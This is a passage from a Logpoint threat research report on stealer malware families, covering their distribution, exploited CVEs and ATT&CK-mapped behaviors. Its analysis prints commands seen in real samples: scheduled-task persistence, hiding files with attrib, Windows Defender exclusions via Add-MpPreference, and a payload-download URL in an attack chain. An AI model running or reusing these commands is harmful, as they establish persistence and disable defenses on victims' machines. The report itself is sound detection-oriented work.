www.logpoint.com A Comprehensive Overview on Stealer Malware Families Emerging Threats Protection Report Over the years, the Logpoint Security Research Team has dedicated efforts on researching emerging threats in the Cybersecurity landscape. As we move into 2024, one trend continues to remains as a significant threat: Stealer Malware also known as Info Stealers. These types of malware can steal sensitive information such as browser data to credit cards and crypto wallets. A contributing factor to the widespread of stealer malware is it's availability in underground forums and Telegram channels, where it is sold for a range from $50 to over $300 USD for monthly subscriptions.

 In response to this emerging threat, we have created a comprehensive report to assist organizations in better understanding the behavior of stealer malware families. The primary objective of this report is to provide readers with an overview of stealer malware, insights into its delivery methods, detection and response with Logpoint Converged, and recommendations for strengthening their defenses against these threats. Foreword www.logpoint.com Nischal Khadgi Logpoint Security Research Nischal is currently a Security Researcher at Logpoint, where his primary focus is on detection engineering, threat hunting, and Emerging Threats research. He is driven by a passion for both Offensive and Defensive Security. Nischal holds a bachelor's degree in cybersecurity, along with certifications as an ethical hacker and Security+. Table of contents Foreword and Author About Logpoint Emerging Threats Protection Summary Distribution Behavior Analysis Detection through Logpoint Converged SIEM Investigation and Response using Logpoint Converged SIEM Recommendation Conclusion 01 02 03 09 14 39 50 54 56 www.logpoint.com The cybersecurity threat landscape continuously changes while new risks and threats are constantly discovered. Only some organizations have enough resources or the know-how to deal with evolving threats. Emerging Threats Protection is a managed service provided by a Logpoint team of highly skilled security researchers who are experts in threat intelligence and incident response. Our team informs you of the latest threats and provides custom detection rules and tailor-made playbooks to help you investigate and mitigate emerging incidents. **All new detection rules are available as part of Logpoint’s latest release and through the Logpoint Help Center. Customized investigation and response playbooks are available to all Logpoint Emerging Threats Protection customers. About Logpoint Emerging Threats Protection https://servicedesk.logpoint.com/hc/en-us/articles/115003928409 https://servicedesk.logpoint.com/hc/en-us/articles/115003928409 03www.logpoint.com SUMMARY 2023 has been a cybersecurity rollercoaster, with more sophisticated cyberattacks, data breaches, and evolving threats. As we approach 2024, one trend remains a long-standing threat to the cybersecurity landscape: stealer malware. Malware, short for "malicious software," refers to any harmful software or code that can steal data and damage or destroy computer systems. The motives behind malware are diverse, including making money off users, stealing sensitive data or disrupting work efficiency. The world of malware is mixed, with various motivations. For example, Ransomware, encrypts organizations data and demands ransom in exchange for decryption. Trojans, on the other hand, masquerade as legitimate software to trick users into installing malicious software. Under the Trojan category, there are Loaders, Droppers, or simply Loaders that attempt to install other types of malware on an infected system. Then we have, Stealers who have their own place in this world. The term “stealer” or “info stealer” is self-explanatory. Stealers are trojans that collect and retrieve data from infected systems. It's obvious that, as the name implies, they steal information. If we reflect on the trend from the previous year, there has been a notable rise in the use of the Below is a rundown of the incident, potential threats, and how to detect any potential attacks and proactively defend using Logpoint Converged SIEM capabilities. PHASE 1 PHASE 2 PHASE 3 PHASE 4 �� Research for emerging threats such as malware families, threat actors and vulnerabilitie� ��  Data retrieval e.g., malware samples, IOCs, and TTP �� Analysis of the collected data and malware and, tracking of threat actors’ activitie� ��  Creation and update analytics and playbooks� ��  Writing of ETP report �� Publishing of report �� Continuous monitoring for other emerging threats to create next ETP report 04www.logpoint.com Stealer malware variant. If we reflect on the trend from the last year, there has been a noteworthy rise in the use of Stealer malware. A report from any. run highlights that in 2023, loaders, stealers, and RATs (Remote Access Trojans) were the most common uploaded malware types, with counts of 24,136, 18,290, and 17,431, respectively. The graph below depicts the top 5 malware types from 2023. When we look at the stealer malware families trend from 2023, Redline Stealer was by far the most widespread malware detected, more than twice as the second-most common malware, Remcos. One factor contributing to the popularity of stealer malware is its prevalence in underground forums and Telegram channels. These forums operate on the Malware-as-a-Service (MaaS) model, offering threat actors an affordable and straightforward method to execute advanced cyber attacks and achieve their malicious objectives. Top 5 malware types (source: any. run) Eternity Market Place Top 5 malware types from 2023 Ransonware - 14.50%
 (12 820) RAT - 19.70% (17 131) Stealer - 20.70% (18 290) Trojan - 17.70%
 (15 630) Loader - 27.30%
 (24 136) https://any.run/cybersecurity-blog/annual-report-2023/ https://any.run/cybersecurity-blog/malware-trends-2023/ https://any.run/cybersecurity-blog/malware-trends-2023/ 05www.logpoint.com The figure below illustrates the workflow of employing stealer malware. The workflow starts with a threat actor, who may either develop custom stealers or purchase them from a Stealer-as-a-Service (Or Malware as a Service) provider. Some stealers collect data from compromised systems and leak the collected logs to the dark web, Telegram, Discord, or other cybercrime forums. Threat actors may purchase these logs and use them to gain initial access to organizations they wish to target. The impact of stealer malware can be devastating, as evidenced by incidents like the Uber hack in 2022. Following the incident, a follow-up analysis by Singapore-based Group-IB revealed that downloaded artifacts captured in some of the screenshots shared by the threat actor were logs gathered from stealer malware. These logs were put up for sale on the cybercriminal underground just days before the incident. Group-IB's analysis indicated that at least two Uber employees from Indonesia and Brazil had been infected by stealer malware Raccoon and Vidar. (Source: Uptycs) Selling Stealer logs (Source: uptycs) Stealer Workflow Threat Actor Threat Actor Stealer: develop or purchase Custom development Develop own stealer [-] User for following� � Credential harvestin� � Lateral movemen� � Email spam� � Internal phishin� � Supply chain attack Using StaaS Service Purchase from StaaS provider � Stealer logs initial acces� � Stealer builder Purchase stealer from StaaS provider Threat actor purchase the stealer log for initial access StaaS (Stealer as a Service) Stealer as a Service (StaaS)
 Selling the builder for stealer Advertising on cyber crime forum - Provide contact into connec� � TO� � Telegra� � Jabber - Price - Proof of work - Detection ratio against EDR/AV - Material/README about builder Selling the logs which contain the credentials 
 of infected users Selling the stealers logs � Private channe� � Telegra� � Cyber crime forums https://twitter.com/GroupIB/status/1570821174736850945 https://www.uptycs.com/hubfs/White-Paper_Stealers.pdf https://www.uptycs.com/hubfs/White-Paper_Stealers.pdf 06www.logpoint.com If we look for such cases, the list is extensive, highlighting the severe impact of stealer malware. While stealer malware may employ diverse tactics, their ultimate objective is to exfiltrate sensitive data from the victim machine. At its core, most stealer malware aims to capture “System/Host Information,” “Cookies,” “Saved Credentials,” “Email Clients data,” “VPN Credentials,” “Browser Cache,” “Cryptocurrency Wallets,” “Browser History,” “Saved Credit Cards.” 
 The graph below depicts the top 5 Stealer malware families trending from 2023 and operating as Malware as a Service. Moving forward with the report, we will cover a comprehensive analysis of these stealer malware families observed in 2023: Redline, Remcos, AgentTesla, Formbook, and Vidar, which will serve as reference points for identifying common patterns. We will also explore the different delivery mechanisms employed by threat actors to deliver this malware into victim environments. Top 5 Stealer malware families Top 5 malware families from 2023 Vidar (1569) AgentTesla (4215) Remcos (4407) FormBook (2098) Redline (9205) 07www.logpoint.com Mitre ATT&CK Mapping Redline Stealer Remcos AgentTesla FormBook Vidar Acquire Infrastructure: Malvertising (T1583.008) Obtain Capabilities: Malware (T1588.001) Resource Development Phishing (T1566) Initial Access Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder (T1547.001) Schedule Task/Jobs (T1053) Persistence Command and Scripting Interpreter (T1059) Exploitation for Client Execution (T1203) Schedule Task/Job (T1053) User Execution(T1204) Execution Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002) Process Injection (T1055) Schedule Task/Job (T1053) Privilege Escalation Hide Artifacts: Hidden Files and Directories (T1564.001) Hide Artifacts: Hidden Window (T1564.003) Impair Defenses: Disable or Modify System Firewall (T1562.004) Indicator Removal: File Deletion (T1070.004) Masquerading: Match Legitimate Name or Location (T1036.005) Defense Evasion: Process Injection (T1055) Defense Evasion: Obfuscated Files or Information (T1027) Defense Evasion: Bypass User Account Control (T1548.002) Defense Evasion 08www.logpoint.com Mitre ATT&CK Mapping Redline Stealer Remcos AgentTesla FormBook Vidar Archive Collected Data (T1560) Clipboard Data (T1115) Input Capture: Keylogging (T1056.001) Screen Capture (T1113) Collection Account Discovery (T1087) File and Directory Discovery (T1083) Peripheral Device Discovery (T1120) Process Discovery (T1057) Query Registry (T1012) Software Discovery (T1518) System Information Discovery (T1082) System Location Discovery (T1614) System Network Configuration Discovery (T1016) System/Owner User Discovery (T1033) System Service Discovery (T1007) Discovery Application Layer Protocol: Web Protocols (T1071.001) Non-Application Layer Protocol (T1095) Command and Control Exfiltration Over Alternative Protocol (T1048) Exfiltration over C2 Channel (T1041) Exfiltration Credentials from Web Browsers (T1555.003) Input Capture: Keylogging (T1056.001) Steal Web Session Cookie (T1539) Credentials in Files (T1552.001) Credential Access 09www.logpoint.com Distribution The distribution of Stealer malware has been observed through various methods. However, two primary methods stand out: Malvertising and Phishing. Each technique represents a unique approach threat actors use to distribute this malware. We will provide with detailed explanations of each method below. Malvertising Malvertising, a blend of "malware" and "advertising," is a stealthy technique cybercriminals use to target specific individuals discreetly. This method involves purchasing advertising space on reputable websites and embedding malicious code within seemingly legitimate ads. Despite their outward appearance, these advertisements contain malicious code. When these malicious advertisements are clicked on, they redirect users to malicious websites or secretly install malware on their systems. In recent years, there has been an alarming increase in malvertising incidents with the shift to Google Malvertising. 
 Also, threat actors have been observed leveraging SEO poisoning techniques to boost the visibility of their malicious websites, making them appear more genuine to consumers. SEO poisoning deceives the human mind into believing that the top hits are the most credible, proving highly effective as people refrain from carefully examining their search results. Case Study I According to a report from DarkTrace, an advertisement appeared on Google when users in the United States searched for the term "Notepad++." Clicking on this advertisement directed victims to the website notepadplusplus[.]site After selecting their desired software version, victims were directed to a “download button” on the website. Regardless of the chosen version, clicking "Download" redirected traffic to hxxps://download-notepad-plus- plus.duckdns[.]org/, which initiated the download of a.zip file named "npp.Installer.x64.zip". Following execution, the malware promptly connected to a Telegram channel to acquire its command and control (C2) address. Redline Stealer Remcos AgentTesla FormBook Vidar Acquire Infrastructure: Malvertising (T1583.008) ✓ ✓ ✓ ✓x Source: DarkTrace https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google 10www.logpoint.com In cases where Telegram was unavailable, the malware attempted to connect to a profile on the Steam video game platform. It then checked in, obtained its configuration file, and downloaded get.zip, an archive containing several DLL libraries. These libraries were strategically used to extract information and save passwords from various applications and browsers. The in-depth traffic analysis, examination of the malware's method for obtaining its Command and Control (C2) location, and analysis of the configuration provide a high-confidence assessment that the malware in question is the info-stealer Vidar. Source: DarkTrace Source: DarkTrace Vidar Config file (source: DarkTrace) https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google 11www.logpoint.com Case Study II We will cover another example of stealer malware delivery via Google Ads campaigns; according to a report from Securelist, fake pages for AMD drivers and Blender 3D software were prominently advertised. A closer look at the URLs revealed that, while they contained software names, they were unrelated to the genuine vendors. Notably, these deceptive domains frequently used common top-level domains (TLDs), increasing their appearance of legitimacy. Users who interacted with these ads were prompted to download a ZIP archive called "blender-3.4.1-windows- x64.zip." Even though the fake download size was the same as the legitimate Blender 3D installer, further investigation revealed discrepancies. After extraction, the archive created two files: the original Blender 3D MSI installer and a malicious loader. Google Ads Campaigns (Source: securelist) Source: Securelist https://securelist.com/malvertising-through-search-engines/108996/ https://securelist.com/malvertising-through-search-engines/108996/ https://securelist.com/malvertising-through-search-engines/108996/ 12www.logpoint.com The dropped malicious loader appeared larger due to inflation with junk bytes during creation. Upon execution, the installer used a CMD method to secretly run the malicious loader while also running the legitimate Blender 3D installer to conceal its activities. Similar to a "pre-installer," this technique tricked victims into unknowingly installing the malware and the desired software. The loader then executed PowerShell commands to orchestrate the download and execution of the payload from a third-party URL. These commands were used to hide the malicious activity using fileless techniques and legitimate .NET framework tools for execution. The payload, decrypted from a base64-encoded, AES-encrypted binary, revealed itself as the RedLine stealer, which used sophisticated techniques to hide its activities and avoid detection. Source: Securelist Source: Securelist Source: Securelist 13www.logpoint.com Phishing Many stealer malware infections are attributed to spam emails, whether through malicious attachments or links. In one instance ,Threat actors have employed the Redline Stealer Campaign by disguising it within hotel reservation- related emails—the link in the message points to the URL through which Redline Stealer is downloaded. In another instance, Agent Tesla was observed being distributed through email masquerading as a price quotation request. The deceptive email, posing as legitimate communication from a South Korean company in the mining and metals industry, includes an attachment. However, the attached document is an RTF file that exploits the CVE-2018-0802 vulnerability. The RTF document contains an embedded link to an external source. Once clicked, this link downloads the Agent Tesla Malware to the victim's machine. Redline Stealer Remcos AgentTesla FormBook Vidar Phishing ✓ ✓ ✓ ✓ ✓ Source: difesaesicurezza Source: Bitdefender https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-warns-of-agent-tesla-phishing-campaign/ https://www.difesaesicurezza.com/en/defence-and-security/cybercrime-new-redline-stealer-campaign-via-hotel-bookings/ https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-warns-of-agent-tesla-phishing-campaign/ 14www.logpoint.com Behavior Analysis Execution (TA0002) Execution encompasses techniques that enable adversary-controlled code to run on a local or remote system, facilitating malware execution. This critical stage includes executing the malware payload, turning off security controls, and performing other actions needed to achieve the objectives. Execution: Exploitation for Client Execution (T1203) Adversaries can exploit specific vulnerabilities to execute arbitrary code and subsequently run malware on targeted systems. Users commonly expect to encounter files related to the applications they frequently use for work, making these applications prime targets for exploitation. For instance, Office applications are often targeted by adversaries for exploitation. The table below outlines vulnerabilities frequently exploited by threat actors to execute these Stealer malware strains. CVE-2023-38831 is a high-severity Arbitrary Code Execution vulnerability discovered in WinRAR versions prior to 6.23. This exploit allows attackers to run malicious scripts inside an archive disguised as seemingly legitimate text or image files like '.jpg,' '.txt,' 'PDF,' and others. It has been observed that threat actors were exploiting this vulnerability to deliver stealer malware families Remcos, Agent Tesla, and Formbook. In one instance, we observed that a CMD file was disguised as a PDF file, coexisting with a folder of the same name. The AgentTesla malware which was contained within the folder was executed upon opening the file which was disguised as PDF file. Redline Stealer Remcos AgentTesla FormBook Vidar Execution: Exploitation for Client Execution (T1203) ✓ ✓ ✓✓ x Malware Exploited Vulnerabilities Redline Stealer CVE-2022-1096, CVE-2021-26411 Remcos CVE-2017-11882, CVE-2023-38831 AgentTesla CVE-2017-11882, CVE-2023-38831 FormBook CVE-2021-40444 https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/ 15www.logpoint.com CVE-2023-38831 is a high-severity Arbitrary Code Execution vulnerability discovered in WinRAR versions prior to 6.23. This exploit allows attackers to run malicious scripts inside an archive disguised as seemingly legitimate text or image files like '.jpg,' '.txt,' 'PDF,' and others. It has been observed that threat actors were exploiting this vulnerability to deliver stealer malware families Remcos, Agent Tesla, and Formbook. In one instance, we observed that a CMD file was disguised as a PDF file, coexisting with a folder of the same name. The AgentTesla malware which was contained within the folder was executed upon opening the file which was disguised as PDF file. According to the report from nsfocusglobal, on October 9th, it was uncovered that threat actors targeted the Ukrainian government sector by dropping the Remcos through the WinRAR exploit CVE-2023-38831. By disguising it as a NATO-zip archive, the file contained a benign PDF file and a CMD file used to deliver the Remcos payload. In November 2017, Microsoft issued an advisory regarding CVE-2017-11882, a vulnerability affecting the Equation Editor feature in Microsoft Office. This high-severity flaw enables attackers to execute arbitrary code within the current user's context by mishandling objects in memory. Exploiting this vulnerability successfully could lead to remote code execution. When a user downloads and opens a malicious attachment, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with Command and Control and downloads additional files without further user interaction. Despite being discovered in 2017, many organizations continue to use vulnerable versions of Microsoft Office, providing an opportunity for threat actors to exploit. Multiple Instances have been observed where stealer malware families, such as Agent Tesla and Remcos, were distributed exploiting this vulnerability. Source: any. run https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/ https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/ https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882 https://app.any.run/tasks/0ee6eac1-82a2-48a9-bd87-cb02ebbefd2c/?utm_source=twitter&utm_medium=post&utm_campaign=sample&utm_content=linktotask&utm_term=280923/ 16www.logpoint.com CVE-2021-40444 is a remote code execution discovered in MSHTML, the engine that powers Internet Explorer. This component is essential to modern Windows systems, spanning both user and server environments, and is used by programs such as MS Word and MS PowerPoint for web content interaction. Exploiting the vulnerability involves embedding a specialized object in a Microsoft Office document with a URL linking to a malicious script. Upon opening the document, Microsoft Office retrieves the script from the URL, executing it via the MSHTML engine. The script can then utilize ActiveX controls to perform malicious actions on the victim's computer. In some instances, Formbook has been observed exploiting CVE-2021-40444. The attack chain for this specific campaign is illustrated in the picture below. CVE-2022-1096 affects the Chrome v8 JavaScript and WebAssembly engine and is exploited when malicious actors execute arbitrary code on a vulnerable system. According to the report from CloudSEK, Redline Stealer has been observed exploiting CVE-2022-1096 to target millions of users. CVE-2021-26411 is a memory corruption vulnerability in Microsoft Internet Explorer; the vulnerability arises from an error in how the affected software processes maliciously crafted web pages. Exploitation occurs when an attacker deceives a user into accessing such a page, enabling the execution of arbitrary code within the application's context. According to the report from Bitdefender, the RIG Exploit Kit campaign leveraged this vulnerability to deliver RedLine Stealer. Source: Trendmicro h t t p : / / 0 x 6 B . 0 2 5 4 . 0 1 1 3 . 0 2 4 4 : 8 0 9 0 h t t p : / / 0 x 6 B . 0 2 5 4 . 0 1 1 3 . 0 2 4 4 : 8 0 9 0 / p a y l o a d . c a b h t t p : / / c d n . d i s c o r d a p p . c o m / [ . . . ] / a v a t a r. j p g Email Server Contents Server ContentsDLL with PowerShell Stage 1 payload.inf PowerShell Stage 2 FormBook malwear.NET injector Exploit
 CVE-2021-4044 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 https://nvd.nist.gov/vuln/detail/CVE-2022-1096 https://www.cloudsek.com/threatintelligence/redline-stealer-exploits-cve-2022-1096-in-chromium-browsers-to-target-millions-of-users https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26411/ https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/ https://www.trendmicro.com/en_vn/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html 17www.logpoint.com Execution: Command and Scripting (T1059) Windows Command Shell, PowerShell, and Windows Script Host (wscript) are frequently leveraged by adversaries for malicious purposes due to their widespread availability and extensive capabilities within Windows environments. This tactic is commonly used in conjunction with phishing campaigns, where adversaries try to trick users into opening malicious attachments, resulting in the execution of malicious scripts. In one observed sample of Redline Stealer, Upon execution, the malware initiates command using the Windows Command Shell (cmd.exe), which triggers the execution of a batch file located within the user's temp directory. Similar instances have been observed upon execution of Vidar malware, where the Windows Command Shell is invoked to launch a malicious executable located within the user's temp directory. Redline Stealer Remcos AgentTesla FormBook Vidar Command and Scripting (T1059) ✓ ✓ ✓ ✓✓ Source: any.run Source:any.run https://bazaar.abuse.ch/sample/2d9a9143fcb477dd37249f8d0f10ab0a7c5a509eecd5e69772ff8d319d75fcac/ https://app.any.run/tasks/892c2cb5-c1a9-4b3b-bff0-3afbb6f7f5f7/ https://app.any.run/tasks/a478800f-49b3-440a-bd32-313330f05ccb/ 18www.logpoint.com Likewise, similar behavior is observed upon execution of Remcos, which leverages the Windows command shell to execute a batch file located within the public libraries directory (C:\Users\Public\Libraries\) Upon execution of AgentTesla, it commonly employs a multi-stage process. In one instance, a Visual Basic Script (VBS) is executed, which contains obfuscated code; within this VBS script, a command typically invokes PowerShell using the Windows Script Host ( ).wscript.exe FormBook employs PowerShell with a bypass execution policy and no profile settings to execute a command, usually contained within macros, that downloads malicious content from a specified URL. Source:any.run Source: Mcafee https://app.any.run/tasks/a478800f-49b3-440a-bd32-313330f05ccb/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/ 19www.logpoint.com Execution: User Execution (T1204) Adversaries might depend on specific user actions to achieve execution of malware. Social engineering tactics may be employed to manipulate users into executing malicious code, such as opening a malicious document file or clicking on a malicious link. These user actions often stem from forms of phishing. They are observed as follow-on behaviors and play a crucial role in deploying and activating stealer malware, allowing adversaries to gather sensitive information from compromised systems. Persistence (TA0003) Persistence ensures an uninterrupted presence on a target system through restarts, credential changes, and other disruptions. Through establishing persistence, malware will maintain prolonged access, facilitating the accomplishment of objectives. 
 In most cases, We have observed, Stealer malware has commonly used two methods to achieve persistence: adding the malware payload into the Registry Run Key or abusing the Windows Task Scheduler service to establish persistence with each login. Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) Malware may establish persistence by adding a program to the startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder ensures that the specified program runs when the user logs in. Redline Stealer Remcos AgentTesla FormBook Vidar Execution: User Execution (T1204) ✓ ✓ ✓ ✓✓ Redline Stealer Remcos AgentTesla FormBook Vidar Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) ✓ ✓ ✓✓ x Almost In every instance, We have observed redline stealer establishes persistence on target system by adding malware payload to Registry Run keys or abusing windows task scheduler. Similar behavior can also be observed in Agent Tesla, FormBook, and Remcos malware to establish persistence on the target system. Redline Stealer Persistence (source: Cynet) Remcos Persistence (source:any.run) https://www.cynet.com/attack-techniques-hands-on/redline-is-on-track-next-stop-your-credentials/ https://any.run/report/9d8282d54901d4e795f0469a5191242b2e7b3b0c51f810f71c739bfff52de8d5/8cd984a4-a489-4817-a0a2-8600a00f4f76?_gl=1*1wfqblw*_gcl_au*MzczNDE0NTIxLjE3MDQ4NjU1ODE.*_ga*MTg4MzQyNzcwLjE2OTYxNjgyOTA.*_ga_53KB74YDZR*MTcwNzcxMjAyMS42NC4xLjE3MDc3MTQ3MDUuMC4wLjA. 20www.logpoint.com Persistence: Schedule Task/Job (T1053) Malware may use task scheduling functionality to enable the initial or recurring execution of malicious code within predefined intervals. We have observed almost in all instance stealer malware has used this functionality by abusing utilities in all major operating systems to schedule programs or scripts for execution on specific dates and times. In one sample of Redline Stealer, upon execution, it drops new files that masquerade system processes “svchost.exe” and subsequently creates a scheduled task. According to a report from Grindsoft, RedLine Stealer creates an additional folder within the Temp directory to store the malware-loading script. The malware then creates a schedule task that runs this script every 3 minutes using the following command. Analyzing the report from quorumcyber, similar behavior has been observed upon execution of Vidar for persistence with the following command. During analysis of the Remcos sample, it was found to drop an XML file into the temp directory. Subsequently, it creates a new scheduled task named "Updates\filename" and configures it with an XML file in the temp directory. Redline Stealer Persistence (source: triage) Remcos Schedule Task (source: any.run) Redline Stealer Remcos AgentTesla FormBook Vidar Scheduled Task/Job (T1053) ✓ ✓ ✓ ✓✓ schtasks.exe /create /tn "Puoi" /tr "C:\\Users\\user\\AppData\\Local\\Temp 
 \\zqNDtAgMrV\\binary.exe C:\\Users\\user\\AppData\\Local\\Temp 
 \\zqNDtAgMrV\\z" /sc minute /mo 3 /F 1 2 3 "C:\Windows\System32\schtasks.exe" /CREATE /TN "Windows\IntelComputingToolkit\IntelUpdaterTask" /TR "C:\ProgramData\lnteIIxculler\IntelCacheUpdater.exe" /SC MINUTE 1 2 https://gridinsoft.com/spyware/redline https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf https://app.any.run/tasks/646bb05d-0ccc-4766-84cb-c0436c85bc75?_gl=1*1ifwi98*_gcl_au*MzczNDE0NTIxLjE3MDQ4NjU1ODE.*_ga*MTg4MzQyNzcwLjE2OTYxNjgyOTA.*_ga_53KB74YDZR*MTcwNzU3MTc3NC42MS4xLjE3MDc1NzI0NjcuMC4wLjA./ https://tria.ge/230404-ej3qeaee6w/behavioral1 https://app.any.run/tasks/646bb05d-0ccc-4766-84cb-c0436c85bc75 21www.logpoint.com Agent Tesla Schedule Task (source: any.run) Formbook Schedule Task (source: triage) Likewise, similar persistence behavior has been observed in Agent Tesla and Formbook samples. Privilege Escalation (TA0004) Privilege escalation comprises of techniques that malware leverages to acquire higher-level permissions on a system or network. Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002) Malware may circumvent User Account Control (UAC) mechanisms to elevate process privileges on a system; Windows User Account Control (UAC) permits a program to raise its privileges (tracked as integrity levels ranging from low to high) to execute a task under administrator-level permissions, often by prompting the user for confirmation. In the Remcos sample observed from any. run, it modifies the registry value under “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA” and sets the value to 0, which is associated with User Account Control (UAC) on Windows systems. When the value is set to "0", it disables User Access Control. Redline Stealer Remcos AgentTesla FormBook Vidar Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002) ✓✓x x x https://app.any.run/tasks/099ae41d-866e-4d6b-b3f3-5ff8fe922bc7 https://tria.ge/230419-v17zfseb8y/behavioral3 https://gridinsoft.com/spyware/redline https://tria.ge/230419-v17zfseb8y/behavioral3 22www.logpoint.com Agent Tesla Schedule Task (source: any.run) Vidar Disabling UAC (source: triage) Similar behavior can be observed in the Vidar Sample, which modifies the registry value associated with UAC and sets it to 0, effectively disabling UAC. According to the report from Gridinsoft, before sending collected data to the command and control server, Vidar stealer saves it in a directory within the ProgramData folder. This hidden directory allows the malware to avoid detection during normal browsing. Vidar creates folders corresponding to different categories of extracted data within the directory, named with a random sequence. Unsorted data and screenshots are placed directly in the root directory. Defense Evasion (TA0005) Defense Evasion encompasses various techniques used by malware to avoid detection during a compromise, including uninstalling or disabling security software or obfuscating or encrypting data and scripts. Hide Artifacts:Hidden Files and Directories (T1564.001) Malware often employs the tactic of hiding files and directories to evade detection mechanisms. Most operating systems include the concept of 'hidden' files, which are intentionally concealed from users when browsing the file system through a graphical user interface or using standard commands on the command line. This serves to prevent accidental modifications to critical system files by regular users. Redline Stealer Remcos AgentTesla FormBook Vidar Hide Artifacts:Hidden Files and Directories (T1564.001) ✓✓ x x x https://app.any.run/tasks/099ae41d-866e-4d6b-b3f3-5ff8fe922bc7 https://tria.ge/230505-y8zjtsch97/behavioral1 https://tria.ge/230505-y8zjtsch97/behavioral1 https://gridinsoft.com/spyware/vidar 23www.logpoint.com Data collected by Vidar (source: gridinsoft) In sample of Redline Stealer, upon execution it drops file with extension of “.bat.exe”, as soon as file is dropped it is made hidden leveraging “attrib”, an inbuilt Windows utility to display or modify attributes of files or folders using the following command. In the sample analyzed from any.run, Agent Tesla utilizes a compiled HTML file (.chm) to hide its malicious code, which then invokes PowerShell to download a second-stage payload via fileless techniques using a “-WindowStyle hidden” parameter. Hide Artifacts: Hidden Window (T1564.003) Malware frequently leverages the PowerShell “-WindowStyle Hidden" parameter to conceal its activities from users' view. These may obscure every application operations that would otherwise be visible. System administrators can also use this technique to perform administrative tasks without disrupting user work environments. Windows scripting languages such as PowerShell, JScript, and Visual Basic provide features for hiding windows. Redline Stealer Remcos AgentTesla FormBook Vidar Hide Artifacts:Hidden Window (T1564.003) ✓ ✓✓ xx attrib +s +h "C:\Users\admin\Desktop\ filename.bat".exe1 https://gridinsoft.com/spyware/vidar https://bazaar.abuse.ch/sample/3c53c9fabd1631125c5d295d22f5482ae226cf0bb34bc3de88e530b72347fc88/ https://app.any.run/tasks/803bc852-0431-41b2-8270-9c7635ed9cf6/ 24www.logpoint.com Redline Stealer Hidden Window Agent Tesla Defender Exclusion (source: Vmray) This behavior can also be observed in Remcos, which leverages "-WindowStyle hidden" parameter to conceal malicious activity from plain sight. This behavior is discussed further in the techniques below. Impair Defenses: Disable or Modify System Firewall (T1562.004) Adversaries or malware may tamper with system firewall configuration to evade defense. This involves disabling or altering firewall configurations, such as disabling the entire mechanism or modifying specific rules. These modifications can occur through various methods depending on the operating system, including the command line, modifying Windows Registry keys, or leveraging the Windows Control Panel. 
 One common behavior exhibited by all stealer malware is leveraging the "Add-MpPreference" cmdlet to tamper Windows Defender configurations, allowing them to exclude specific files, paths, or extensions from scanning. In the sample analyzed from Vmray, Agent Tesla adds a specific file path to the payload to Windows Defender's list of exclusions, which will ignore the file when performing scans, allowing it to evade detection. Redline Stealer Remcos AgentTesla FormBook Vidar Impair Defenses: Disable or Modify System Firewall (T1562.004) ✓ ✓ ✓ ✓✓ https://www.vmray.com/analyses/95a4220eee2c/report/behavior_grouped.html https://www.vmray.com/analyses/95a4220eee2c/report/behavior_grouped.html 25www.logpoint.com FormBook Defender Exclusion (source: Vmray) Vidar Defender Exclusion (source: any.run) Redline Stealer Defender Exclusion (source: triage) Similar behavior was observed during the analysis of a FormBook sample. After execution, the malware drops payloads under the AppData directory and excludes these files from scans using the "Add-MpPreference" cmdlet. During our analysis of a Vidar sample on any.run, we observed the following command This command adds file extensions to Windows Defender's list of excluded file types, effectively instructing it to ignore any files containing the ".dll," “exe,” or “bat” extensions during scans. Additionally, it excludes the "C" directories from Windows Defender's list of exclusions. In the Redline sample analyzed from triage, a similar behavior was observed, where instead of adding a specific file path, all directories were added to Windows Defender's list of exclusions. powershell.exe" Add-MpPreference -ExclusionExtension exe powershell.exe" Add-MpPreference -ExclusionExtension dll powershell.exe" Add-MpPreference -ExclusionExtension bat 1 2 3 https://www.vmray.com/analyses/276d67bffae1/report/behavior_grouped.html https://app.any.run/tasks/0dee7080-1586-450e-9dbe-b2c164e282d4/ https://tria.ge/230917-wzgasaef72/behavioral2 https://www.vmray.com/analyses/276d67bffae1/report/behavior_grouped.html https://app.any.run/tasks/0dee7080-1586-450e-9dbe-b2c164e282d4/ https://tria.ge/230917-wzgasaef72/behavioral2 26www.logpoint.com Redline Stealer Disabling Defender (source: triage) Also, in another sample of Redline, Redline Stealer is found to disable real-time protection. This is accomplished by modifying registry settings related to Windows Defender's real-time protection capabilities. The malware disables several aspects of Windows Defender's real-time monitoring capabilities, including behavior monitoring, on-access protection, and real-time scanning. It also creates a registry key for Windows Defender's real-time protection and configures values to disable specific features. During our analysis of the Remcos sample on any.run, we have observed the following command: In the observed sample, Redline Stealer executed a command to forcefully terminate a process using taskkill with a specific process ID and then deleted a file from a specified location. This command launches PowerShell in a hidden window, adding exclusion extensions for both the Temp directory and ".exe" files to Windows Defender. Following a brief sleep, it retrieves an executable file from a remote server and saves it to the Temp directory. Subsequently, it executes the downloaded file with cmd.exe

 Indicator Removal Adversaries or malware frequently use tactics to delete or modify artifacts within systems, attempting to erase evidence of its presence and evade defense. 
